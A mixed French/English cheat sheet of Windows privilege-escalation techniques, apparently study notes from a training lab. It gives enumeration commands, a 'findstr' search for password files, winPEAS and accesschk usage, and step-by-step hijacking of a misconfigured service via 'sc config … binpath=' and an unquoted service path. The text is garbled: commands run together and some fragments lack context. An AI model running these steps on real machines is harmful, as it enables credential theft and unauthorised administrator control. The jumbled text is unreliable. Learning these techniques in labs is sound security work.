
Mon manuel sur les concepts d'élévation de privilèges sous Windows. Consultez ma playlist, lien : https://www.youtube.com/playlist?list=PLlrnAg4kKF3puXLI0JyltbNJOC2R2HVFk
An Important point worth noting is Groups, any user of Group Administrator helps us to escalate!
whoami /priv - privilèges de l'utilisateur actuelnet users - liste tous les utilisateursnet user <username> - liste les détails d'un utilisateur spécifiqueqwinsta - autres utilisateurs connectés simultanémentnet localgroup - groupes disponibles sur le systèmenet localgroup <group-name> - liste les membres d'un groupe spécifiquesysteminfo - donne toutes les informations sur le système d'exploitationhostname - nom d'hôte du systèmefindstr /si password *.txt - nous recherchons les fichiers contenant 'password', notamment dans les fichiers textewmic qfe get Caption,Description,HotFixID,InstalledOn - cela indique les correctifs de sécurité et les informations associéesnetstat -ano - connexions associées à la machineschtasks /query /fo LIST /v - pour rechercher les tâches planifiéesdriverquery - liste les informations relatives aux pilotessc query windefend - recherche le service antivirussysteminfo sur votre machine, et c'est la seule condition requise pour cet outilwmic product get name,version,vendor - cela donne le nom du produit, la version et le fournisseur. Cette commande particulière donne une bonne visualisation de ce dont nous avons besoin.wmic service list brief | findstr "Running" et pour obtenir plus d'informations sur le service, utilisez sc qc <ServiceName>post/multi/recon/local_exploit_suggester, assurez-vous que votre session est en arrière-plan pour que cet outil fonctionne correctement, ou vous pouvez simplement le charger depuis meterpreter.winpeas.exe --helpsysteminfo et copiez-les dans un fichier nommé avec l'extension .txtIci, nous allons essayer d'identifier les services avec des permissions non sécurisées, puis nous pourrons tenter de les exploiter.
Ici, nous pouvons utiliser la commande winpeas.exe servicesinfo et nous pouvons voir les services qui sont assez utiles
Une partie intéressante de la sortie est la suivante :```
daclsvc(DACL Service)["C:\Program Files\DACL Service\daclservice.exe"] - Manual - Stopped YOU CAN MODIFY THIS SERVICE: ChangeConfig
Mais pour obtenir plus d'informations, nous pouvons utiliser un outil appelé **accesschk**, qui est un outil de Microsoft, et l'exécuter comme suit `accesschk.exe /accepteula -uwcqv <current-user> <service>`, la sortie est,```
C:\PrivEsc>accesschk.exe /accepteula -uwcqv user daclsvc
daclsvc
SERVICE_QUERY_STATUS
SERVICE_QUERY_CONFIG
SERVICE_CHANGE_CONFIG
SERVICE_INTERROGATE
SERVICE_ENUMERATE_DEPENDENTS
SERVICE_START
SERVICE_STOP
READ_CONTROL
service_change_config où nous pouvons modifier la configuration du service.sc qc <service> puis notez le Binary_path_name(qui peut aussi être appelé binpath), que nous allons modifier (sourire maléfique)sc config <service> <option>="<value>"sc config daclsvc binpath="<path>" puis démarrez le service sc start daclsvcVulnerable Service: C:\Program Files\Ignite Data\Vuln Service\file.exe
The system will read this path in the following sequence from 1 to 4 to trigger malicous.exe through a writeable directory.